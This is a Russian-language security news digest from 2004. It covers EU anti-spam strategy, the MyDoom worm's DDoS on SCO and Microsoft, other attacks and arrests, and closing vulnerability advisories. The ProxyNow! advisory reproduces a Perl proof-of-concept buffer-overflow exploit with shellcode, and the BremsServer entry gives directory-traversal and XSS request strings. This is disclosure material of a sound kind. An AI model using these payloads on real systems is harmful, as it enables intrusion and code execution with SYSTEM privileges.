Евросоюз разрабатывает стратегию борьбы со спамом

На прошлой неделе Еврокомиссия обнародовала документ, в котором изложены стратегия и принципы, которых должны придерживаться правительства стран, входящих в Евроссоюз, для организации борьбы со спамом. Согласно приведенной статистике, в 2003 г. трафик, приходящийся на долю рекламных почтовых сообщений составил половину от всего почтового трафика сети, а некоторые люди из-за появления огромного количества разновидностей спама могут перестать в будущем пользоваться не только электронной почтой но и сотовыми телефонами, принимающими SMS. Следует заметить, что в 2002 г. Евросоюз уже пытался бороться со спамом, распространяемым по электронной почте, однако тогда этот порыв натолкнулся на весьма существенное препятствие в виде наличия в каждой стране Евросоюза своих собственных, значительно отличающихся друг от друга законодательств в области киберпреступлений. В результате, самые заядлые спамеры просто переезжали в те страны Евросоюза, где не существовало законодательной базы для борьбы с ними. Сейчас же основные усилия, по мнению Еврокомиссии, следует направить на выработку единых правовых норм во всей Еврозоне. Особое внимание будет уделено Великобритании, в которой штраф за рассылку спама составляет в денежном эквиваленте менее 10 тыс. долл. И это при том, что некоторые спамеры там зарабатывают от 40 до 60 тыс. долларов в неделю. В результате, Великобритания в декабре прошлого года вошла в десятку наиболее "спамящих" стран мира. Планируется также оказать определенное влияние на деловые структуры, пропагандируя среди них отказ от рекламы с помощью спама. В дальнейшем планируется наладить международное сотрудничество, чтобы эффективно бороться со спамерами непосредственно там, откуда они действуют. Более того, рассматривается возможность со временем применять и другие меры против спама, вплоть до принятия экономических санкций по отношению к странам, поощряющим спамеров.

Мир может остаться без Интернета на 10 дней

Компания The SCO Group сообщила, что готова выплатить 250 000 долларов США за информацию, которая бы помогла арестовать автора вируса I-Worm.Novarg , но это не спасет Интернет от возможной катастрофы. Напомним, что появившийся несколько дней назад почтовый червь I-Worm.Novarg имеет в себе заложенную функцию DoS атаки на сайт компании The SCO Group с 1 по 12 февраля.

Представители компании The SCO Group заявили также о том, что они обратились в ФБР с просьбой идентифицировать автора вируса I-Worm.Novarg (также известного как Mimail.R и MyDoom). Вирус был обнаружен в диком виде в понедельник, а за сутки эпидемия охватила весь мир.

Представители компании The SCO Group заявили, что они догадываются о том, кто мог написать и выпустить в Интернет вирус I-Worm.Novarg . Каких-либо конкретных имен не прозвучало, однако, скорее всего, речь идет о приверженцах открытого исходного кода, не желающих выплачивать лицензионные отчисления за Linux. Теперь же вирус I-Worm.Novarg может привести к тому, что сайт компании The SCO Group будет парализован в течении 12 дней, что может сказаться, как на репутации компании, так и на ее финансовом положении.

Вирус I-Worm.Novarg в данный момент бьет все рекорды по скорости распространения: за прошедшие дни он инфицировал более 10% подключенных к Интернету компьютеров в Украине и нанес значительный ущерб пользователям. Как отмечает "Украинский Антивирусный Центр", вирус I-Worm.Novarg может парализовать Интернет на 10 дней.

Уже сейчас объемы Интернет-трафика выросли в несколько раз, а с 1 по 12 февраля возможны обвалы отдельных участков Интернета. Напомним, что именно в этот период вирус I-Worm.Novarg будет проводить DoS атаку с инфицированных компьютеров: с каждого компьютера будет создано 63 нити, каждая из которых производит обращение к сайту www.sco.com. Такие нагрузки на каналы связи могут привести к тому, что работа многих провайдеров будет парализована. При этом пострадают не только пользователи инфицированных компьютеров, но и пользователи без вирусов, которые просто не смогут воспользоваться Интернетом из-за перегруженности интернет-каналов на уровне провайдера.

Комментарий к эпидемии Mydoom.A

В связи с "топовой" новостью последних дней о нашествии червя Mydoom.A. технический редактор компании Panda Software Фернандо де ля Квадра написал небольшой комментарий.

Для того, чтобы заставить пользователей открывать зараженные письма, создатели вирусов обычно используют технологии так называемого "социального инжиниринга". В действительности за этим сложным термином скрывается обычное мошенничество, используемое для привлечения внимания пользователей.

Классическим примером является вирус Loveletter. В мае 2000 года он распространился по всему миру, выдавая зараженное письмо за любовное послание. Многие люди помнят последствия той эпидемии. Сотни тысяч, если не миллионов, пользователей открыли это сообщение, не обращая внимания на невероятность источника любовного послания, ведь им мог быть и директор компании, в которой работал адресат, и соседка по лестничной площадке. Вдобавок, сообщение всегда было на английском. Тем не менее, пользователи в сотнях стран по всему миру "купились" на эту простенькую уловку. Получается, что было бы достаточно подумать хотя бы пару секунд, чтобы избежать случившегося. К сожалению, любопытство одержало верх. Мы знаем, чем это обернулось.

Сегодня подобная тактика вирусописателей не всегда оказывается успешной. Многие пользователи уже достаточно наслышаны об опасности подобных писем и относятся к ним с подозрением. Следовательно, настало время для создания червей, способных обманывать и тех, кто хорошо знаком с типичными приманками, используемыми создателями вирусов.

Так появился червь Mydoom.A. Почему бы опытному пользователю не открыть сообщение об ошибке с почтового сервера? Простая тема и текст сообщения, содержащие предупреждение о поврежденном электронном письме, спровоцировали устрашающую по своим масштабам эпидемию.

Этот червь сыграл на знаниях системных администраторов и опытных пользователей. Пользователи, которые не купятся на приманку в виде порнографической фотографии, изъявили огромное желание взглянуть на сообщение о поврежденном письме.

Между тем, если зараженное сообщение открывает системный администратор, вирус может получить доступ к гораздо большему количеству файлов, нежели в случае с обычным пользователем, так как обычно администратор имеет полные права. Последствия катастрофические. Не спасет никакой, даже фантастический, защитный барьер, если одно из звеньев цепи нарушено, тем более если теоретически это "самое сильное звено" - системный администратор.

Как правило, в первую очередь стремятся закрыть потенциальные технические бреши в ИТ системе: если возникает ошибка в маршрутизаторе, он просто обновляется при помощи соответствующего пакета. И очень редко обращают внимание на подготовку пользователей всех уровней. Но все чаще причиной инцидентов является именно ошибка человека.

Еще вчера было достаточно простого предупреждения пользователей о необходимости забыть о своем любопытстве при просмотре электронных сообщений. Сегодня ситуация стала гораздо серьезнее - администраторы должны быть также осторожны с сообщениями об ошибках, как и пользователи с порнографическими фотографиями. Это вопрос безопасности.

"Mydoom.B".

"Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама сообщает об обнаружении новой версии сетевого червя "Mydoom" ("Novarg") - "Mydoom.B".

На данный момент уже поступили сообщения о случаях заражения этой вредоносной программой. "Лаборатория Касперского" не исключает, что для распространения "Mydoom.B" были использованы компьютеры зараженные предыдущей версией червя. По этой причине не исключено, что в ближайшие часы начнется новая вирусная эпидемия, по масштабам многократно превосходящая "Mydoom.A".

На данный момент "Лаборатория Касперского" проводит анализ этой вредоносной программы. Известно, что червь также распространяется по электронной почте и файлообменной сети KaZaA. Файл-носитель червя имеет размер около 28 килобайт и содержит текстовую строку "sync-1.01; andy; I'm just doing my job, nothing personal, sorry". Кроме того, объект DDoS-атаки сменен с сайта www.sco.com на www.microsoft.com.

KavkazWeb.net подвергся крупнейшей кибератаке

KavkazWeb.net подвергся крупнейшей в истории Кавказа атаке хакеров 26 Января Кавказский Интернет портал был подвержен крупнейшей DDOS атаке в истории Кавказа.
Ровно в 9 часов утра около 9000 компьютеров начали посылать "пустые" сигналы на сервер KavkazWeb.net в городе Los Vegas, штат Невада.
Беспрецендентный размер атаки привел к вынужденному отключению сервера.
Атака продолжалась в течении всего дня. Сразу после обнаружения атаки специалисты компании Апласхостинг, приступили к розыску злоумышленников.

По версии специалистов, вирус DDOS был написан специально для атаки на KavkazWeb.net. После запуска вируса в Интернет он захватил 9000 компьютеров и в заданное время они начали посылать "пустые" запросы на сервер, тем самым блокируя запросы реальных посетителей.

Мотивы и имена злоумышленников пока остаются неизвестны, но учитывая
высокую активность КавказВеб.нет в политической жизни Кавказских республик и организованность хакеров напавших на KavkazWeb.net, можно с уверенностью сказать что KavkazWeb.net был атакован именно по политическим причинам.

Максим Высочанский будет выдан властям США

Посольство Украины в Таиланде получило письмо от Максима Высочанского, которого обвиняют в совершении компьютерных преступлений в США против банковских учреждений, в частности, в подделке кредитных карточек. В письме речь идет о том, что он не будет подавать апелляцию на решение таиландского суда об его экстрадиции в США. Об этом сообщил сегодня спикер МИД Украины Маркиян Лубкивский. По его словам экстрадиция состоится в течение 2 месяцев.

Как известно, Таиланд согласился с требованием США выдать для суда украинского гражданина Максима Высочанского-Ковальчука. Его обвиняют в многочисленных компьютерных преступлениях в Соединенных Штатах. Полгода суд таиландской столицы рассматривал дело задержанного в мае 25-летнего Максима Высочанского-Ковальчука. Украинца обвиняют в нарушении законодательства об авторском праве, отмывании грязных денег, распространении через Интернет нелицензионного программного обеспечения и в других компьютерных преступлениях против банков США.

25-летний Высочанский был задержан в Таиланде в мае 2003 года по требованию США.
В Вашингтон арестант прибудет под конвоем приблизительно 20 марта. По некоторым данным, одно из финансовых учреждений в Лос-Анджелесе (Калифорния) внимательно следило за судьбой Максима. Не исключено, что после того, как он понесет заслуженное наказание, ему будет предоставлена работа в банке. Впрочем, на американских интернет-форумах это предположение категорически отрицается. Дескать, к судьбе хакеров, находящихся в камерах предварительного заключения, всегда проявляется особое внимание. Им сулят золотые горы, почет и уважение, однако после того, как эти самые хакеры оказываются за решеткой, о работе в солидных финансовых учреждениях можно напрочь забыть.

Если вина Высочанского будет окончательно доказана, то, согласно американскому законодательству, ему грозит тюремное заключение на срок до десять лет и штраф в размере $50 тысяч.

Три новых вируса парализовали работу компьютеров в Украине

Академия АйТи и Академия ФСБ России разработали программу подготовки специалистов в области информационной безопасности

Слушатели двух новых циклов курсов Академии АйТи станут обладателями сертификата Академии ФСБ России, подтверждающего качество полученных знаний.

Для получения сертификата специалистам необходимо прослушать два курса в Академии АйТи. Один базовый - "Информационная безопасность. Создание, внедрение и эксплуатация систем и средств защиты информации", второй - по выбору. Слушателям, выбравшим курс "Информационная безопасность. Практикум управления безопасностью (планирование, контроль и реагирование)", выдается сертификат "Специалист по безопасности вычислительных систем и сетей – офицер службы безопасности", а успешная сдача экзамена по теме "Информационная безопасность. Практикум эксплуатации средств защиты информации в сетях" дает право на присвоение квалификации "Специалист по безопасности вычислительных систем и сетей – администратор безопасности сети".

Источник: Пресс-релиз компании АйТи

В Украине около 10% компьютеров, имеющих доступ в Интернет, уже заражены вирусом

В Украине около 10% компьютеров, имеющих доступ в интернете, уже заражены стремительно распространяющимся по Сети вирусом Novarg и его разновидностями.

Эпидемия вируса Novarg (или Mydoom), который может стать самым быстро распространяющимся вирусом в истории Сети, началась 26 января. 27 января этот вирус заразил полмиллиона компьютеров и в пять раз увеличил почтовый трафик в интернете, передает РБК.

"По состоянию на утро вторника мы зафиксировали 300 000 заражений этим вирусом по всему миру, а к шести часам вечера это число, по нашим оценкам, возросло до 500 000, - говорит руководитель информационной службы антивирусной "Лаборатории Касперского" Денис Зенкин. - Объем почтовой корреспонденции в интернете вырос примерно в пять раз, что приводит к массовым нарушениям коммуникаций".

В "Украинском антивирусном центре" сообщили, что в Украине жертвами эпидемии Novarg и его разновидностей (в частности, почтовые черви I-Worm.Dumaru.j, I-Worm.Mimail.q и I-Worm.Novarg) стали уже не менее 10% компьютеров, передает "Интерфакс-Украина".

Саморассылающийся вирус позволяют злоумышленникам загружать и выполнять на инфицированных компьютерах вредоносные файлы, уничтожать или похищать информацию, а также полностью перехватывать управление над компьютером.

Все три вируса распространяются в электронных письмах с вложением. Файл вложения имеет расширение выполняемого файла (exe, com или др.) или архива (zip).

Вирусы активизируются только в случае, если пользователь открывает вложенный файл, поэтому наиболее простой способ предохранения от заражения - не открывать вложения с подозрительным файлом.

Тема письма, зараженного вирусом - пустое поле, случайный набор символов или слова hello, hi!, error, test, status и пр.

Особенностью вируса I-Worm.Mimail.q является то, что он атакует сервер компании-разработчика программного обеспечения SCO. Именно эта компания обладает правами на операционную систему UNIX и недавно публично заявила о намерении подать в суд на корпорации, использующие Linux. Представители SCO уже объявили о высокой награде за информацию, которая поможет найти создателя вируса.

Как ожидается, с 1 по 12 февраля каждый зараженный компьютер отправит на сервер этой компании 63 обращения, что может привести к перебоям работы сервера из-за перегрузок. При этом червь содержит предупреждение к владельцам почтовых систем: автор вируса предупреждает, что если почтовая система каким-либо образом пресечет распространение информации с пораженных компьютеров, то в следующей версии червя будет включена атака на эту систему.

Множественные уязвимости в Gaim

Множественные уязвимости в Gaim Программа: Gaim 0.75 и более ранние версии Опасность: Критическая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в Gaim. Удаленный пользователь может выполнить произвольный код на целевой системе пользователя. Stefan Esser сообщил о 12 уязвимостях, включая переполнение стекового буфера, переполнение кучи и целочисленное переполнение. Некоторые из обнаруженных уязвимостей требуют выполнение “man-in-the-middle” нападения для эксплуатации. Подробности смотрите в источнике сообщения. Пример/Эксплоит: URL производителя: http://gaim.sourceforge.net/ Решение: Неофициальное исправление доступно через CVS : http://security.e-matters.de/patches/gaim-0.75-fix.diff

Advisory 01/2004: 12 x Gaim remote overflows

Межсайтовый скриптинг и просмотр произвольных файлов в BremsServer

Межсайтовый скриптинг и просмотр произвольных файлов в BremsServer Программа: BremsServer 1.2.4 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в BremsServer. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может также выполнить XSS нападение. 1. http://[target]/./PATH/windows/system.ini 2. http://[target]/<script>alert("Test")</script> URL производителя: http://www.herberlin.de/bremsserver.php Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Directory traversal and XSS in BremsServer 1.2.4

Удаленное выполнение произвольного кода в ProxyNow!

Удаленное выполнение произвольного кода в ProxyNow! Программа: ProxyNow! 2.75 и более ранние версии Опасность: Критическая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в ProxyNow! Удаленный пользователь может выполнить произвольный код на системе с SYSTEM привилегиями. Удаленный пользователь может послать специально обработанный HTTP get запрос к прокси на 3128 TCP порту, чтобы вызвать переполнение буфера и выполнить произвольный код: GET ftp://('a'x647)('AAAA')('XXXX') HTTP/1.1 Запрос должен быть послан от 4 до 8 раз. Также сообщается, что следующий запрос вызовет переполнение стекового буфера: GET ('ftp://www.nosite.com/')('a'x249)('BBBB')('XXXX') HTTP/1.1 #!/usr/bin/perl -w # Remote Stack Overflow in ProxyNow! 2.x PoC Exploit # Tested on Windows XP Home SP1 # Ever seen notepad.exe with SYSTEM privileges? :-/ # - by Peter Winter-Smith [peter4020@hotmail.com] use IO::Socket; if(!($ARGV[1])) print "Usage: proxynow.pl <victim> <port>\n" . "\tDefault port is 3128\n\n"; exit; print "Remote Stack Overflow in ProxyNow! PoC - Executes notepad.exe\n" . "Notepad.exe will only be visible from the Task Manager!\n\n"; $victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0], PeerPort=>$ARGV[1]) or die "Unable to connect to $ARGV[0] on" . "port $ARGV[1]"; $nops = "\x90\x90\x90\x90"; $subcode = "\x89\xE0\x05\x03\xFF\xFF\xFF\xFF" . "\xE0"; $shellcode = "\x31\xC9\x51\x68\x65\x70\x61\x64" . "\x68\xFF\x6E\x6F\x74\x8D\x44\x24" . "\x01\x50\xB8\x44\x80\xC2\x77\xFF" . "\xD0\xCC"; $pad = "XXXXXXXX"; $ebp = "BBBB"; $eip = "\x3B\x58\x01\x10"; $bad = "GET ftp://www.nosite.com/" . "\x90"x33 . $shellcode . "a"x19 0 . $ebp . $eip . $nops . $subcode . $pad . "\x20HTTP/1.1\r\n\r\n"; print $victim $bad; print "[+] Data sent: Check for notepad.exe running as SYSTEM!\n"; sleep(2); close($victim); print "[+] Done!\n"; exit; URL производителя: http://www.internetnow.com.my/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

ProxyNow! 2.x Multiple Overflow Vulnerabilities

Межсайтовый скриптинг в WebLogic Server and Express

Межсайтовый скриптинг в WebLogic Server and Express Программа: WebLogic Server and Express 5.1 SP13, 6.1 SP6, 7.0 SP4, 8.1 SP2 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в WebLogic Server and Express. Удаленный пользователь может выполнить XSS нападение, используя HTTP TRACE запросы. URL производителя:http://dev2dev.bea.com/resourcelibrary/advisoriesnotifications/BEA04_48.00.jsp Решение:Установите соответствующее обновление: or WebLogic Server and Express 8.1, upgrade to Service Pack 2 and apply the following patch: ftp://ftpna.beasys.com/pub/releases/security/CR124746_81sp2.jar The patch will be included within Service Pack 3. For WebLogic Server and Express 7.0, upgrade to Service Pack 4 and apply the following patch: ftp://ftpna.beasys.com/pub/releases/security/CR124746_70sp4.jar The patch will be included in Service Pack 5. For WebLogic Server and Express 6.1, upgrade to Service Pack 6 and apply the following patch: ftp://ftpna.beasys.com/pub/releases/security/CR124746_61sp6.jar The fix will be included in Service Pack 7. For WebLogic Server and Express 5.1, upgrade to Service Pack 13 and apply the following patch: ftp://ftpna.beasys.com/pub/releases/security/CR124746_51sp13.jar

SECURITY ADVISORY (BEA04-48.00)

Административный доступ к приложению в WebLogic Server and Express

Административный доступ к приложению в WebLogic Server and Express Программа: WebLogic 8.1 SP1 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в WebLogic Server and Express. Авторизованный оператор может получить доступ к паролям пользователей, имеющих административный доступ к приложению. Пользователь с ролью Operator, не имеющий Admin роли, может получить доступ к чувствительным MBean атрибутам, содержащим пароли, включая пароли the ServerStartMBean.Password и NodeManagerMBean.CertificatePassword. URL производителя:http://dev2dev.bea.com/resourcelibrary/advisoriesnotifications/BEA04_48.00.jsp Решение:Установите SP2 для WebLogic Server and Express 8.1

SECURITY ADVISORY (BEA04-49.00)